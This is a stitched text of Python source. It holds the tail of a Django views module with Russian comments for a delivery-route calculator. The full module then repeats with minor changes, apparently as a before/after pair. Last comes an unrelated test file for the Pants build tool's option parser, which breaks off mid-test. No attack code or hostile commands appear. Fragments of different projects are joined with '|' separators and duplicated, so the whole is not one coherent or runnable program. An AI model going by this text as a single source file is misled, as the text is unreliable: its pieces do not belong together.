'unallocated_dots': unallocated_dots,
})
#Новый расчет
def calcnew_request(request):
if not request.user.is_authenticated:
return redirect("main:login")
if request.method == "POST":
form = CalcNewForm(request.POST, request.FILES)
if form.is_valid():
print(form.cleaned_data.get('store'))
if form.cleaned_data.get('auto_list') is not None:
print(f"{len(form.cleaned_data.get("auto_list"))} {form.cleaned_data.get("auto_list")}")
else:
print("No static auto")
print(f"{len(form.cleaned_data.get("clients_list"))} {form.cleaned_data.get("clients_list")}")
print(form.cleaned_data.get('dyn_auto_count_max'))
print(form.cleaned_data.get('dyn_auto_capacity'))
print(form.cleaned_data.get('dyn_auto_reis_max'))
print(form.cleaned_data.get('dyn_auto_driver_limit'))
try:
current_calc = RouteCalc(
request=request,
store_object=form.cleaned_data.get('store'),
auto_list=form.cleaned_data.get('auto_list'),
delivery_dots_list=form.cleaned_data.get('clients_list'),
dyn_auto={
"count_max": form.cleaned_data.get('dyn_auto_count_max'),
"capacity": form.cleaned_data.get('dyn_auto_capacity'),
"reis_max": form.cleaned_data.get('dyn_auto_reis_max'),
"driver_limit": form.cleaned_data.get('dyn_auto_driver_limit'),
},
params={
"with_return": form.cleaned_data.get('with_return'),
"high_accuracy": form.cleaned_data.get('high_accuracy'),
"auto_min": form.cleaned_data.get('auto_min'),
"early_arrival": form.cleaned_data.get('early_arrival'),
"lately_arrival": form.cleaned_data.get('lately_arrival'),
}
)
calc_id = current_calc.calculate_and_save()
response = redirect('main:viewroute')
response['Location'] += f"?id={calc_id}"
return response
except ValueError as e:
if settings.DEBUG:
raise
messages.error(request, f"Ошибка расчета: {str(e)}")
else:
messages.error(request, f"Ошибка загрузки!")
else:
form = CalcNewForm
return render(request,
'main/calcnew.html',
context={'form': form}
)
#История расчетов
def calclist_request(request):
if not request.user.is_authenticated:
return redirect("main:login")
filter_user = request.GET.get('filter_user', '')
if not any(filter_user == single_choice[0] for single_choice in CALCLIST_USERFILTER_CHOICES):
filter_user = CALCLIST_USERFILTER_CHOICES[0][0]
form = CalcListForm(initial={'filter_user': filter_user})
if filter_user == 'all':
route_sets = RouteSet.objects.all().order_by('-id')
else:
route_sets = RouteSet.objects.filter(username=request.user).order_by('-id')
paginator = Paginator(route_sets, 10, allow_empty_first_page=True)
page = request.GET.get('page')
route_sets = paginator.get_page(page)
return render(
request=request,
template_name='main/calclist.html',
context={
'route_sets': route_sets,
'form': form,
}
)
#Импорт из excel в бд
def import_request(request):
if not request.user.is_authenticated:
return redirect("main:login")
if request.method == "POST":
form = ImportFileForm(request.POST,
request.FILES)
if form.is_valid():
map_dicts = {
'Client': ["ns_code", "name", "latitude", "longtitude", "address",],
'Store': ["ns_code", "name", "latitude", "longtitude", "address",],
}
import_table = form.cleaned_data.get('table')
if import_table not in map_dicts:
messages.error(request, f"Загрузка таблицы не предусмотрена!")
return redirect("main:import")
#проверка доступа
if not request.user.is_staff:
if import_table != 'Client':
messages.error(request, f"Вам разрешена загрузка только контрагентов!")
return redirect("main:import")
if form.cleaned_data.get('rewrite'):
messages.error(request, f"Вам разрешена только загрузка без перезаписи!")
return redirect("main:import")
try:
import_model = apps.get_model('main', import_table)
def filter_func(rows):
rows = list(rows)
#Проверка на первую колонку (в ней пишется тип того, что импортируем)
if rows[0].replace('\t', '').lower() != import_table.lower():
raise ValueError('Неправильный тип файла (проблема с 1 колонкой)')
else:
del rows[0]
#Проверка на пустые координаты
if not rows[2] or not rows[3]:
messages.error(request, f'Обьект не был загружен из-за пустых координат: {rows[0]} {rows[1]}')
return
# Переписывать ли имеющиеся строки
if form.cleaned_data.get('rewrite'):
import_model.objects.filter(ns_code=rows[0]).delete()
else:
try: #Если запись найдена - убираем строку из импорта
import_model.objects.get(ns_code=rows[0])
return
except:
pass
for idx, row in enumerate(rows):
# Фильтр названий
rows[idx] = filter_string(rows[idx])
return rows
request.FILES['file'].save_to_database(
start_row=1,
#name_columns_by_row=2,
bulk_size=256,
initializer=filter_func,
model=import_model,
mapdict=map_dicts[import_table]
)
messages.success(request, f"Импорт успешен!")
response = redirect('main:map')
response['Location'] += '?table=' + import_table.lower()
return response
except:
if settings.DEBUG:
raise
messages.error(request, f"Ошибка: Неверный формат файла!")
return redirect("main:import")
else:
messages.error(request, f"Ошибка загрузки!")
return redirect("main:import")
form = ImportFileForm
return render(request,
'main/import.html',
context={'form': form}
)
def map_request(request):
#Какие объекты необходимо отображать на карте
map_variant = request.GET.get('table', '').capitalize()
if not any(map_variant == single_choice[0] for single_choice in TABLE_CHOICES):
map_variant = TABLE_CHOICES[0][0]
points = apps.get_model('main', map_variant).objects.filter(latitude__gt=0).filter(longtitude__gt=0)
form = MapForm(initial={'table': map_variant})
return render(request,
'main/map.html',
{'form': form,
'points': points,
'map_variant': map_variant.lower(),
})
# def register(request):
# if request.method == "POST":
# form = NewUserForm(request.POST)
# if form.is_valid():
# user = form.save()
# username = form.cleaned_data.get("username")
# messages.success(request, f"Пользователь успешно зарегистрирован: {username}")
# login(request, user)
# messages.info(request, f"Вход под пользователем {username}")
# return redirect("main:homepage")
# else:
# for msg in form.error_messages:
# messages.error(request, f"Ошибка {msg}:{form.error_messages[msg]}")
#
# form = NewUserForm
# return render(request,
# 'main/register.html',
# context={'form': form}
# )
def logout_request(request):
logout(request)
messages.info(request, "Выход из учетной записи: успешно")
return redirect("main:homepage")
def login_request(request):
if request.method == "POST":
form = AuthenticationForm(request, request.POST)
if form.is_valid():
username = form.cleaned_data.get("username")
password = form.cleaned_data.get("password")
user = authenticate(request, username=username, password=password)
if user is not None:
login(request, user)
messages.info(request, f"Вход под пользователем {username}")
return redirect("main:homepage")
messages.error(request, 'Неверно введен логин или пароль')
form = AuthenticationForm
return render(request,
'main/login.html',
context={'form': form}
)
| from django.shortcuts import render, redirect
from django.http import HttpResponse
from django.contrib.auth.forms import AuthenticationForm
from .forms import *
from django.contrib.auth import login, logout, authenticate
from django.contrib import messages
from django.apps import apps
from django.conf import settings
from django.core.paginator import Paginator
import json
import operator
from django.db.models import Q
from .route import RouteCalc, format_to_time, format_to_km, output_result_db_to_csv, format_to_duration
import os
import copy
# #Главная
# def homepage(request):
# #return HttpResponse("Test response")
# return render(request=request,
# template_name='main/home.html',
# context={'AccLogs': AccessLog.objects.all()}
# )
#Ajax запрос списка складов с их кодами
def ajax_getStores(request):
results = {}
if request.is_ajax():
def get_res_store():
q = request.GET.get('term', '')
if not q:
return
search_qs = Store.objects.filter(Q(name__icontains=q) | Q(ns_code__icontains=q))[:5]
for r in search_qs:
results[f"{r.ns_code} {r.name}"] = ''
return results
results = get_res_store()
data = json.dumps(results)
return HttpResponse(data, 'application/json')
#Сохранение маршрута в файл
def saveroute_request(route_set, file_format):
if file_format != 'csv':
return redirect("main:homepage")
filepath = output_result_db_to_csv(route_set)
filew = open(filepath,"rb")
response = HttpResponse(filew.read(), content_type='text/csv')
response['Content-Disposition'] = f'attachment; filename="{route_set.get_short_desc()}.csv"'
filew.close()
os.remove(filepath)
return response
#Просмотр маршрута
def viewroute_request(request):
# if not request.user.is_authenticated:
# return redirect("main:login")
try:
calc_id = int(request.GET.get('id', ''))
gr_variant = int(request.GET.get('gr', 0))
reis_variant = int(request.GET.get('reis', 0))
save_request = request.GET.get('save', '')
route_set = RouteSet.objects.get(id=calc_id)
route_stat = RouteStat.objects.get(route_set=route_set)
except:
messages.error(request, "Неверная ссылка на расчет!")
return redirect("main:homepage")
if not route_stat.reis_count: # Пустой расчет
return render(
request,
'main/message.html',
context={'page_title': 'Пустой расчет',
'msg_title': 'Пустой расчет',
'msg_body': '<h5><p>Расчет не удался.<br>' +
'Попробуйте указать менее строгие параметры расчета</p></h5>' +
f'<p>{route_set}</p>',
})
def in_dictlist(val, dict):
for key, dval in dict:
if key == val: return True
return False
if save_request:
return saveroute_request(route_set, save_request)
#список графиков для комбобокса
route_list = Route.objects.filter(route_set=route_set)
gr_list = []
for graph in route_list.values_list('graph', flat=True).distinct():
gr_list.append((graph, f"Гр. {graph}"))
gr_list.sort(key = operator.itemgetter(0))
if not in_dictlist(gr_variant, gr_list): gr_variant = gr_list[0][0]
#Список рейсов для комбобокса
reis_list = []
for route in route_list.filter(graph=gr_variant):
reis_list.append((route.reis, f"Рейс {route.reis}"))
if not in_dictlist(reis_variant, reis_list): reis_variant = reis_list[0][0]
#поиск текущего выводимого маршрута
current_route = route_list.get(graph=gr_variant, reis=reis_variant)
#общая статистика
route_stat.costs = format_to_duration(route_stat.costs)
#автомобиль
if not current_route.dyn_auto: # Статический
real_auto = {
"name": current_route.get_auto().name,
"capacity": int(current_route.get_auto().capacity),
"used_capacity": int(current_route.get_used_capacity()),
"driver_limit": format_to_time(current_route.get_auto().driver_limit),
"used_driver_limit": format_to_time(current_route.get_auto().get_used_driver_limit()),
}
else: # Динамический
#Поиск времени работы водителя
first_route = Route.objects.filter(route_set=route_set).filter(graph=current_route.graph).order_by('reis')[0]
last_route = Route.objects.filter(route_set=route_set).filter(graph=current_route.graph).order_by('-reis')[0]
used_driver_limit = last_route.reis_start + last_route.get_all_time() - first_route.reis_start
real_auto = {
"name": f"Дин.авто ({current_route.graph})",
"capacity": int(route_stat.dyn_auto_capacity),
"used_capacity": int(current_route.get_used_capacity()),
"driver_limit": format_to_time(route_stat.dyn_auto_driver_limit),
"used_driver_limit": format_to_time(used_driver_limit),
}
#Статистика конкретного маршрута
reis_stat = {
"all_distance": format_to_km(current_route.get_all_distance()),
"all_time": format_to_duration(current_route.get_all_time_with_startwait()),
"delivery_dots_count": current_route.get_delivery_dots_count(),
}
#Маршрут
route_tpl = []
#добавление склада
store_wait_time = current_route.reis_start - current_route.get_start_time_with_startwait() #Ожидание выезда со склада
route_tpl.append({
'num': 1,
'name': f"{route_set.store.ns_code} {route_set.store.name}",
'address': route_set.store.address,
'distance': 0,
'latitude': route_set.store.latitude,
'longtitude': route_set.store.longtitude,
'time_in': format_to_time(current_route.reis_start),
'time_out': format_to_time(current_route.reis_start + current_route.load_time),
'wait_time': ('' if not store_wait_time else format_to_time(store_wait_time)),
'type': 'store'
})
#добавление магазинов
delivery_dots = RouteDot.objects.filter(route=current_route).order_by('num')
last_dot_num = 1
last_time_out = current_route.reis_start
last_coord = {'latitude': '', 'longtitude': ''}
for dot in delivery_dots:
dot_init = dot.get_init_dot()
dot_client = dot_init.client
if dot_client:
client_name = f"{dot_client.ns_code} {dot_init.client_name}"
else:
client_name = dot_init.client_name
client_address = dot_client.address if dot_client else ''
dot_latitude = dot_init.latitude
dot_longtitude = dot_init.longtitude
if not dot_latitude or not dot_longtitude:
dot_latitude = dot_client.latitude
dot_longtitude = dot_client.longtitude
if not (last_coord['latitude'] == dot_latitude and last_coord['longtitude'] == dot_longtitude):
last_dot_num += 1 #С одинаковыми координатами считаем что точка та же самая
route_tpl.append({
'num': last_dot_num,
'name': client_name,
'address': client_address,
'distance': format_to_km(dot.distance),
'latitude': dot_latitude,
'longtitude': dot_longtitude,
'time_in': format_to_time(dot.time_in),
'time_out': format_to_time(dot.time_out),
'wait_time': ('' if not dot.wait_time else format_to_time(dot.wait_time)),
'type': 'client',
})
last_time_out = dot.time_out
last_coord = {'latitude': dot_latitude, 'longtitude': dot_longtitude}
#добавление склада в конец маршрута (если необходимо)
if route_stat.with_return:
store_dot = copy.deepcopy(route_tpl[0])
store_dot['num'] = 1
store_dot['distance'] = format_to_km(current_route.store_return_distance)
store_dot['time_in'] = format_to_time(last_time_out + current_route.store_return_time)
store_dot['time_out'] = ''
store_dot['wait_time'] = ''
route_tpl.append(store_dot)
#Нераспределенные точки
unallocated_dots = []
u_dots = route_set.get_unallocated_delivery_dots()
for dot in u_dots:
dot_client = dot.client
if dot_client:
client_name = f"{dot_client.ns_code} {dot.client_name}"
else:
client_name = dot.client_name
client_address = dot_client.address if dot_client else ''
unallocated_dots.append({
'name': client_name,
'address': client_address,
'quantity': dot.quantity,
'window_in': format_to_time(dot.window_in),
'window_out': format_to_time(dot.window_out),
})
form = RouteForm(
initial={
'gr': gr_variant,
'reis': reis_variant,
'id': calc_id
},
gr_list=gr_list,
reis_list=reis_list
)
return render(request,
'main/viewroute.html',
context={'form': form,
'gr_list': gr_list,
'route_set': route_set,
'calculate_stat': route_stat,
'real_auto': real_auto,
'reis_stat': reis_stat,
'route': route_tpl,
'calc_id': calc_id,
'unallocated_dots': unallocated_dots,
})
#Новый расчет
def calcnew_request(request):
if not request.user.is_authenticated:
return redirect("main:login")
if request.method == "POST":
form = CalcNewForm(request.POST, request.FILES)
if form.is_valid():
print(form.cleaned_data.get('store'))
if form.cleaned_data.get('auto_list') is not None:
print(f"{len(form.cleaned_data.get('auto_list'))} {form.cleaned_data.get('auto_list')}")
else:
print("No static auto")
print(f"{len(form.cleaned_data.get('clients_list'))} {form.cleaned_data.get('clients_list')}")
print(form.cleaned_data.get('dyn_auto_count_max'))
print(form.cleaned_data.get('dyn_auto_capacity'))
print(form.cleaned_data.get('dyn_auto_reis_max'))
print(form.cleaned_data.get('dyn_auto_driver_limit'))
try:
current_calc = RouteCalc(
request=request,
store_object=form.cleaned_data.get('store'),
auto_list=form.cleaned_data.get('auto_list'),
delivery_dots_list=form.cleaned_data.get('clients_list'),
dyn_auto={
"count_max": form.cleaned_data.get('dyn_auto_count_max'),
"capacity": form.cleaned_data.get('dyn_auto_capacity'),
"reis_max": form.cleaned_data.get('dyn_auto_reis_max'),
"driver_limit": form.cleaned_data.get('dyn_auto_driver_limit'),
},
params={
"with_return": form.cleaned_data.get('with_return'),
"high_accuracy": form.cleaned_data.get('high_accuracy'),
"auto_min": form.cleaned_data.get('auto_min'),
"early_arrival": form.cleaned_data.get('early_arrival'),
"lately_arrival": form.cleaned_data.get('lately_arrival'),
}
)
calc_id = current_calc.calculate_and_save()
response = redirect('main:viewroute')
response['Location'] += f"?id={calc_id}"
return response
except ValueError as e:
if settings.DEBUG:
raise
messages.error(request, f"Ошибка расчета: {str(e)}")
else:
messages.error(request, f"Ошибка загрузки!")
else:
form = CalcNewForm
return render(request,
'main/calcnew.html',
context={'form': form}
)
#История расчетов
def calclist_request(request):
if not request.user.is_authenticated:
return redirect("main:login")
filter_user = request.GET.get('filter_user', '')
if not any(filter_user == single_choice[0] for single_choice in CALCLIST_USERFILTER_CHOICES):
filter_user = CALCLIST_USERFILTER_CHOICES[0][0]
form = CalcListForm(initial={'filter_user': filter_user})
if filter_user == 'all':
route_sets = RouteSet.objects.all().order_by('-id')
else:
route_sets = RouteSet.objects.filter(username=request.user).order_by('-id')
paginator = Paginator(route_sets, 10, allow_empty_first_page=True)
page = request.GET.get('page')
route_sets = paginator.get_page(page)
return render(
request=request,
template_name='main/calclist.html',
context={
'route_sets': route_sets,
'form': form,
}
)
#Импорт из excel в бд
def import_request(request):
if not request.user.is_authenticated:
return redirect("main:login")
if request.method == "POST":
form = ImportFileForm(request.POST,
request.FILES)
if form.is_valid():
map_dicts = {
'Client': ["ns_code", "name", "latitude", "longtitude", "address",],
'Store': ["ns_code", "name", "latitude", "longtitude", "address",],
}
import_table = form.cleaned_data.get('table')
if import_table not in map_dicts:
messages.error(request, f"Загрузка таблицы не предусмотрена!")
return redirect("main:import")
#проверка доступа
if not request.user.is_staff:
if import_table != 'Client':
messages.error(request, f"Вам разрешена загрузка только контрагентов!")
return redirect("main:import")
if form.cleaned_data.get('rewrite'):
messages.error(request, f"Вам разрешена только загрузка без перезаписи!")
return redirect("main:import")
try:
import_model = apps.get_model('main', import_table)
def filter_func(rows):
rows = list(rows)
#Проверка на первую колонку (в ней пишется тип того, что импортируем)
if rows[0].replace('\t', '').lower() != import_table.lower():
raise ValueError('Неправильный тип файла (проблема с 1 колонкой)')
else:
del rows[0]
#Проверка на пустые координаты
if not rows[2] or not rows[3]:
messages.error(request, f'Обьект не был загружен из-за пустых координат: {rows[0]} {rows[1]}')
return
# Переписывать ли имеющиеся строки
if form.cleaned_data.get('rewrite'):
import_model.objects.filter(ns_code=rows[0]).delete()
else:
try: #Если запись найдена - убираем строку из импорта
import_model.objects.get(ns_code=rows[0])
return
except:
pass
for idx, row in enumerate(rows):
# Фильтр названий
rows[idx] = filter_string(rows[idx])
return rows
request.FILES['file'].save_to_database(
start_row=1,
#name_columns_by_row=2,
bulk_size=256,
initializer=filter_func,
model=import_model,
mapdict=map_dicts[import_table]
)
messages.success(request, f"Импорт успешен!")
response = redirect('main:map')
response['Location'] += '?table=' + import_table.lower()
return response
except:
if settings.DEBUG:
raise
messages.error(request, f"Ошибка: Неверный формат файла!")
return redirect("main:import")
else:
messages.error(request, f"Ошибка загрузки!")
return redirect("main:import")
form = ImportFileForm
return render(request,
'main/import.html',
context={'form': form}
)
def map_request(request):
#Какие объекты необходимо отображать на карте
map_variant = request.GET.get('table', '').capitalize()
if not any(map_variant == single_choice[0] for single_choice in TABLE_CHOICES):
map_variant = TABLE_CHOICES[0][0]
points = apps.get_model('main', map_variant).objects.filter(latitude__gt=0).filter(longtitude__gt=0)
form = MapForm(initial={'table': map_variant})
return render(request,
'main/map.html',
{'form': form,
'points': points,
'map_variant': map_variant.lower(),
})
# def register(request):
# if request.method == "POST":
# form = NewUserForm(request.POST)
# if form.is_valid():
# user = form.save()
# username = form.cleaned_data.get("username")
# messages.success(request, f"Пользователь успешно зарегистрирован: {username}")
# login(request, user)
# messages.info(request, f"Вход под пользователем {username}")
# return redirect("main:homepage")
# else:
# for msg in form.error_messages:
# messages.error(request, f"Ошибка {msg}:{form.error_messages[msg]}")
#
# form = NewUserForm
# return render(request,
# 'main/register.html',
# context={'form': form}
# )
def logout_request(request):
logout(request)
messages.info(request, "Выход из учетной записи: успешно")
return redirect("main:homepage")
def login_request(request):
if request.method == "POST":
form = AuthenticationForm(request, request.POST)
if form.is_valid():
username = form.cleaned_data.get("username")
password = form.cleaned_data.get("password")
user = authenticate(request, username=username, password=password)
if user is not None:
login(request, user)
messages.info(request, f"Вход под пользователем {username}")
return redirect("main:homepage")
messages.error(request, 'Неверно введен логин или пароль')
form = AuthenticationForm
return render(request,
'main/login.html',
context={'form': form}
)
|
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import json
import os
import shlex
import unittest.mock
from enum import Enum
from functools import partial
from textwrap import dedent
from typing import Any, Dict, List, Optional, Union, cast
import toml
import yaml
from packaging.version import Version
from pants.base.deprecated import CodeRemovedError
from pants.base.hash_utils import CoercingEncoder
from pants.option.config import Config
from pants.option.custom_types import UnsetBool, file_option, shell_str, target_option
from pants.option.errors import (
BooleanConversionError,
BooleanOptionNameWithNo,
FromfileError,
ImplicitValIsNone,
InvalidKwarg,
InvalidMemberType,
MemberTypeNotAllowed,
MutuallyExclusiveOptionError,
NoOptionNames,
OptionAlreadyRegistered,
OptionNameDash,
OptionNameDoubleDash,
ParseError,
RecursiveSubsystemOption,
Shadowing,
)
from pants.option.global_options import GlobalOptions
from pants.option.optionable import Optionable
from pants.option.options import Options
from pants.option.options_bootstrapper import OptionsBootstrapper
from pants.option.parser import Parser
from pants.option.ranked_value import Rank, RankedValue
from pants.option.scope import GLOBAL_SCOPE, ScopeInfo
from pants.testutil.option.fakes import create_options
from pants.testutil.test_base import TestBase
from pants.util.collections import assert_single_element
from pants.util.contextutil import temporary_file, temporary_file_path
from pants.util.dirutil import safe_mkdtemp
from pants.util.strutil import safe_shlex_join
_FAKE_CUR_VERSION = "1.0.0.dev0"
def global_scope() -> ScopeInfo:
return ScopeInfo(GLOBAL_SCOPE, ScopeInfo.GLOBAL, GlobalOptions)
def task(scope: str) -> ScopeInfo:
return ScopeInfo(scope, ScopeInfo.TASK)
def intermediate(scope: str) -> ScopeInfo:
return ScopeInfo(scope, ScopeInfo.INTERMEDIATE)
def subsystem(scope: str) -> ScopeInfo:
return ScopeInfo(scope, ScopeInfo.SUBSYSTEM)
class OptionsTest(TestBase):
@staticmethod
def _create_config(config: Optional[Dict[str, Dict[str, str]]] = None) -> Config:
with open(os.path.join(safe_mkdtemp(), "test_config.toml"), "w") as fp:
toml.dump(config or {}, fp)
return Config.load(config_paths=[fp.name])
def _parse(
self,
*,
flags: str = "",
env: Optional[Dict[str, str]] = None,
config: Optional[Dict[str, Dict[str, Any]]] = None,
bootstrap_option_values=None,
) -> Options:
args = ["./pants", *shlex.split(flags)]
options = Options.create(
env=env or {},
config=self._create_config(config),
known_scope_infos=OptionsTest._known_scope_infos,
args=args,
bootstrap_option_values=bootstrap_option_values,
)
self._register(options)
return options
_known_scope_infos = [
global_scope(),
intermediate("compile"),
task("compile.java"),
task("compile.scala"),
task("cache.compile.scala"),
intermediate("stale"),
intermediate("test"),
task("test.junit"),
subsystem("passconsumer"),
task("simple"),
task("simple-dashed"),
task("scoped.a.bit"),
task("scoped.and-dashed"),
task("fromfile"),
task("fingerprinting"),
task("enum-opt"),
task("separate-enum-opt-scope"),
]
class SomeEnumOption(Enum):
a_value = "a-value"
another_value = "another-value"
def _register(self, options):
def register_global(*args, **kwargs):
options.register(GLOBAL_SCOPE, *args, **kwargs)
register_global("-z", "--verbose", type=bool, help="Verbose output.", recursive=True)
register_global("-n", "--num", type=int, default=99, recursive=True, fingerprint=True)
register_global("--y", type=list, member_type=int)
register_global(
"--v2", help="Two-letter long-form option, used to test option name suggestions."
)
register_global("--config-override", type=list)
register_global("--pants-foo")
register_global("--bar-baz")
register_global("--store-true-flag", type=bool, fingerprint=True)
register_global("--store-false-flag", type=bool, implicit_value=False)
register_global("--store-true-def-true-flag", type=bool, default=True)
register_global("--store-true-def-false-flag", type=bool, default=False)
register_global(
"--store-false-def-false-flag", type=bool, implicit_value=False, default=False
)
register_global(
"--store-false-def-true-flag", type=bool, implicit_value=False, default=True
)
register_global("--def-unset-bool-flag", type=bool, default=UnsetBool)
# Choices.
register_global("--str-choices", choices=["foo", "bar"])
register_global("--int-choices", choices=[42, 99], type=list, member_type=int)
# Custom types.
register_global("--listy", type=list, member_type=int, default="[1, 2, 3]")
register_global("--dicty", type=dict, default='{"a": "b"}')
register_global(
"--dict-listy", type=list, member_type=dict, default='[{"a": 1, "b": 2}, {"c": 3}]'
)
register_global("--targety", type=target_option, default="//:a")
register_global(
"--target-listy", type=list, member_type=target_option, default=["//:a", "//:b"]
)
register_global("--filey", type=file_option, default=None)
register_global("--file-listy", type=list, member_type=file_option)
register_global(
"--shell-str-listy",
type=list,
member_type=shell_str,
default="--default1 --default2=test",
)
# Implicit value.
register_global("--implicit-valuey", default="default", implicit_value="implicit")
# For the design doc example test.
register_global("--a", type=int, recursive=True)
register_global("--b", type=int, recursive=True)
# Deprecated global options
register_global(
"--global-crufty",
removal_version="999.99.9.dev0",
removal_hint="use a less crufty global option",
)
register_global(
"--global-crufty-boolean",
type=bool,
removal_version="999.99.9.dev0",
removal_hint="say no to crufty global options",
)
register_global(
"--global-delayed-deprecated-option",
removal_version="999.99.9.dev0",
deprecation_start_version="500.0.0.dev0",
)
register_global(
"--global-delayed-but-already-passed-deprecated-option",
removal_version="999.99.9.dev0",
deprecation_start_version=_FAKE_CUR_VERSION,
)
# Test that an option past the `removal_version` fails at option registration time.
with self.assertRaises(CodeRemovedError):
register_global(
"--global-crufty-expired",
removal_version="0.0.1.dev0",
removal_hint="use a less crufty global option",
)
# Mutual Exclusive options
register_global("--mutex-foo", mutually_exclusive_group="mutex")
register_global("--mutex-bar", mutually_exclusive_group="mutex")
register_global("--mutex-baz", mutually_exclusive_group="mutex")
register_global("--new-name")
register_global("--old-name", mutually_exclusive_group="new_name")
# For the design doc example test.
options.register("compile", "--c", type=int, recursive=True)
# Test deprecated options with a scope
options.register("stale", "--still-good")
options.register(
"stale",
"--crufty",
removal_version="999.99.9.dev0",
removal_hint="use a less crufty stale scoped option",
)
options.register(
"stale",
"--crufty-boolean",
type=bool,
removal_version="999.99.9.dev0",
removal_hint="say no to crufty, stale scoped options",
)
# Test mutual exclusive options with a scope
options.register("stale", "--mutex-a", mutually_exclusive_group="crufty_mutex")
options.register("stale", "--mutex-b", mutually_exclusive_group="crufty_mutex")
options.register("stale", "--crufty-old", mutually_exclusive_group="crufty_new")
options.register("stale", "--crufty-new")
# For task identity test
options.register("compile.scala", "--modifycompile", fingerprint=True)
options.register("compile.scala", "--modifylogs")
options.register(
"compile.scala",
"--modifypassthrough",
fingerprint=True,
passthrough=True,
type=list,
member_type=str,
)
# For scoped env vars test
options.register("simple", "--spam")
options.register("simple-dashed", "--spam")
options.register("scoped.a.bit", "--spam")
options.register("scoped.and-dashed", "--spam")
# For fromfile test
options.register("fromfile", "--string")
options.register("fromfile", "--intvalue", type=int)
options.register("fromfile", "--dictvalue", type=dict)
options.register("fromfile", "--listvalue", type=list)
options.register("fromfile", "--appendvalue", type=list, member_type=int)
# For fingerprint tests
options.register("fingerprinting", "--inverted") # Implicitly: daemon=True
options.register("fingerprinting", "--definitely-not-inverted", daemon=False)
options.register("fingerprinting", "--fingerprinted", fingerprint=True)
options.register("fingerprinting", "--definitely-not-fingerprinted", fingerprint=False)
# For enum tests
options.register("enum-opt", "--some-enum", type=self.SomeEnumOption)
# For testing the default value
options.register(
"separate-enum-opt-scope",
"--some-enum-with-default",
default=self.SomeEnumOption.a_value,
type=self.SomeEnumOption,
)
def test_env_var_of_type_int(self) -> None:
create_options_object = partial(
Options.create,
config=self._create_config(),
known_scope_infos=OptionsTest._known_scope_infos,
args=shlex.split("./pants"),
)
options = create_options_object(env={"PANTS_FOO_BAR": "123"})
options.register(GLOBAL_SCOPE, "--foo-bar", type=int)
self.assertEqual(123, options.for_global_scope().foo_bar)
options = create_options_object(env={"PANTS_FOO_BAR": "['123','456']"})
options.register(GLOBAL_SCOPE, "--foo-bar", type=list, member_type=int)
self.assertEqual([123, 456], options.for_global_scope().foo_bar)
def test_arg_scoping(self) -> None:
# Some basic smoke tests.
options = self._parse(flags="--verbose")
self.assertEqual(True, options.for_global_scope().verbose)
options = self._parse(flags="-z compile path/to/tgt")
self.assertEqual(["path/to/tgt"], options.specs)
self.assertEqual(True, options.for_global_scope().verbose)
with self.assertRaises(ParseError):
self._parse(flags="--unregistered-option compile").for_global_scope()
# Scoping of different values of the same option.
# Also tests the --no-* boolean flag inverses.
options = self._parse(flags="--verbose compile.java --no-verbose")
self.assertEqual(True, options.for_global_scope().verbose)
self.assertEqual(True, options.for_scope("compile").verbose)
self.assertEqual(False, options.for_scope("compile.java").verbose)
options = self._parse(
flags="--verbose compile --no-verbose compile.java -z test test.junit --no-verbose"
)
self.assertEqual(True, options.for_global_scope().verbose)
self.assertEqual(False, options.for_scope("compile").verbose)
self.assertEqual(True, options.for_scope("compile.java").verbose)
self.assertEqual(True, options.for_scope("test").verbose)
self.assertEqual(False, options.for_scope("test.junit").verbose)
# Test list-typed option.
global_options = self._parse(config={"DEFAULT": {"y": ["88", "-99"]}}).for_global_scope()
self.assertEqual([88, -99], global_options.y)
global_options = self._parse(
flags="--y=5 --y=-6 --y=77", config={"DEFAULT": {"y": ["88", "-99"]}}
).for_global_scope()
self.assertEqual([88, -99, 5, -6, 77], global_options.y)
global_options = self._parse().for_global_scope()
self.assertEqual([], global_options.y)
global_options = self._parse(
env={"PANTS_CONFIG_OVERRIDE": "['123','456']"}
).for_global_scope()
self.assertEqual(["123", "456"], global_options.config_override)
global_options = self._parse(env={"PANTS_CONFIG_OVERRIDE": "['']"}).for_global_scope()
self.assertEqual([""], global_options.config_override)
global_options = self._parse(
flags="--listy='[1, 2]'", config={"DEFAULT": {"listy": "[3, 4]"}}
).for_global_scope()
self.assertEqual([1, 2], global_options.listy)
# Test dict-typed option.
global_options = self._parse(flags='--dicty=\'{"c": "d"}\'').for_global_scope()
self.assertEqual({"c": "d"}, global_options.dicty)
# Test list-of-dict-typed option.
global_options = self._parse(
flags='--dict-listy=\'[{"c": "d"}, {"e": "f"}]\''
).for_global_scope()
self.assertEqual([{"c": "d"}, {"e": "f"}], global_options.dict_listy)
# Test target-typed option.
global_options = self._parse().for_global_scope()
self.assertEqual("//:a", global_options.targety)
global_options = self._parse(flags="--targety=//:foo").for_global_scope()
self.assertEqual("//:foo", global_options.targety)
# Test list-of-target-typed option.
global_options = self._parse(
flags='--target-listy=\'["//:foo", "//:bar"]\''
).for_global_scope()
self.assertEqual(["//:foo", "//:bar"], global_options.target_listy)
# Test file-typed option.
with temporary_file_path() as fp:
global_options = self._parse(flags=f'--filey="{fp}"').for_global_scope()
self.assertEqual(fp, global_options.filey)
# Test list-of-file-typed option.
with temporary_file_path() as fp1:
with temporary_file_path() as fp2:
global_options = self._parse(
flags=f'--file-listy="{fp1}" --file-listy="{fp2}"'
).for_global_scope()
self.assertEqual([fp1, fp2], global_options.file_listy)
def test_explicit_boolean_values(self) -> None:
def assert_boolean_value(*, arg: str, expected: bool) -> None:
global_options = self._parse(flags=f"--verbose={arg}").for_global_scope()
assert global_options.verbose is expected
assert_boolean_value(arg="false", expected=False)
assert_boolean_value(arg="False", expected=False)
assert_boolean_value(arg="true", expected=True)
assert_boolean_value(arg="True", expected=True)
def test_boolean_defaults(self) -> None:
global_options = self._parse().for_global_scope()
self.assertFalse(global_options.store_true_flag)
self.assertTrue(global_options.store_false_flag)
self.assertFalse(global_options.store_true_def_false_flag)
self.assertTrue(global_options.store_true_def_true_flag)
self.assertFalse(global_options.store_false_def_false_flag)
self.assertTrue(global_options.store_false_def_true_flag)
self.assertIsNone(global_options.def_unset_bool_flag)
def test_boolean_set_option(self) -> None:
global_options = self._parse(
flags="--store-true-flag --store-false-flag --store-true-def-true-flag "
"--store-true-def-false-flag --store-false-def-true-flag --store-false-def-false-flag "
"--def-unset-bool-flag"
).for_global_scope()
self.assertTrue(global_options.store_true_flag)
self.assertFalse(global_options.store_false_flag)
self.assertTrue(global_options.store_true_def_false_flag)
